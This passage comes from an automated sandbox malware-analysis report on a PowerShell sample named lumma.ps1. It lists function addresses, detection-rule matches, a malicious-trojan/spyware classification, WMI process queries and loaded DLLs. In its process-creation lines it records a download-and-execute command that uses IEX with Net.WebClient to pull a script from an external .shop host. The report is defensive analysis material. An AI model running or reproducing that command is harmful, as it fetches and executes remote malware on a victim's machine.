                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F6A6702_2_06F6A670
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F6C7072_2_06F6C707
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F6D8C82_2_06F6D8C8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F6D8B82_2_06F6D8B8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004112278_2_00411227
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004392808_2_00439280
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042D34A8_2_0042D34A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004274408_2_00427440
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00421D008_2_00421D00
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043C5A08_2_0043C5A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004086008_2_00408600
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040E6878_2_0040E687
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00438EA08_2_00438EA0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004157C08_2_004157C0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040C8408_2_0040C840
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041D0038_2_0041D003
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040D0218_2_0040D021
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040D83C8_2_0040D83C
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004038C08_2_004038C0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042A0CA8_2_0042A0CA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004338D08_2_004338D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042C0E68_2_0042C0E6
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004160E98_2_004160E9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041B8F68_2_0041B8F6
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042C09E8_2_0042C09E
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041C8A08_2_0041C8A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004388B08_2_004388B0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042C09E8_2_0042C09E
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004061608_2_00406160
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041E9608_2_0041E960
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004181698_2_00418169
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004059008_2_00405900
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040B1008_2_0040B100
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004269108_2_00426910
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004281CC8_2_004281CC
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004409E08_2_004409E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042C9EB8_2_0042C9EB
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042E1808_2_0042E180
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043F18B8_2_0043F18B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004291AE8_2_004291AE
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004239B98_2_004239B9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043CA408_2_0043CA40
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00435A4F8_2_00435A4F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043DA4D8_2_0043DA4D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004042708_2_00404270
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041E2208_2_0041E220
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043FA208_2_0043FA20
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00419AD08_2_00419AD0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004242D08_2_004242D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00439A808_2_00439A80
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00428ABC8_2_00428ABC
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040AB408_2_0040AB40
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004213408_2_00421340
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042F3778_2_0042F377
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004093108_2_00409310
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043FB108_2_0043FB10
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043FB2A8_2_0043FB2A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043FB288_2_0043FB28
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040F3C08_2_0040F3C0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004073D08_2_004073D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004283D88_2_004283D8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041EB808_2_0041EB80
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00404BA08_2_00404BA0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043A4408_2_0043A440
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004404608_2_00440460
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041747D8_2_0041747D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00433C108_2_00433C10
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004204C68_2_004204C6
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004224E08_2_004224E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040D4F38_2_0040D4F3
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00431CF08_2_00431CF0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00414CA08_2_00414CA0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042CD4C8_2_0042CD4C
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042CD5E8_2_0042CD5E
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004245608_2_00424560
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043FD708_2_0043FD70
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00440D208_2_00440D20
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00411D2B8_2_00411D2B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00426D2E8_2_00426D2E
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00439D308_2_00439D30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042C53C8_2_0042C53C
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043A5D48_2_0043A5D4
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004065F08_2_004065F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043CDF08_2_0043CDF0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00437DA98_2_00437DA9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004386508_2_00438650
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042EE638_2_0042EE63
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00420E6C8_2_00420E6C
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00422E6D8_2_00422E6D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042FE748_2_0042FE74
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043FE008_2_0043FE00
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040F60D8_2_0040F60D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041961B8_2_0041961B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041E6308_2_0041E630
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004246D08_2_004246D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004406F08_2_004406F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00402EB08_2_00402EB0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041AEB08_2_0041AEB0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004277408_2_00427740
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004127508_2_00412750
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041DF508_2_0041DF50
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00416F528_2_00416F52
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00425F1B8_2_00425F1B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004297398_2_00429739
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004097808_2_00409780
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00414C90 appears 77 times
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00407F60 appears 40 times
                  Source: Process Memory Space: powershell.exe PID: 7432, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 7792, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@7/8@2/2
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00439280 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,8_2_00439280
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgz320r3.hoq.ps1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))}
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
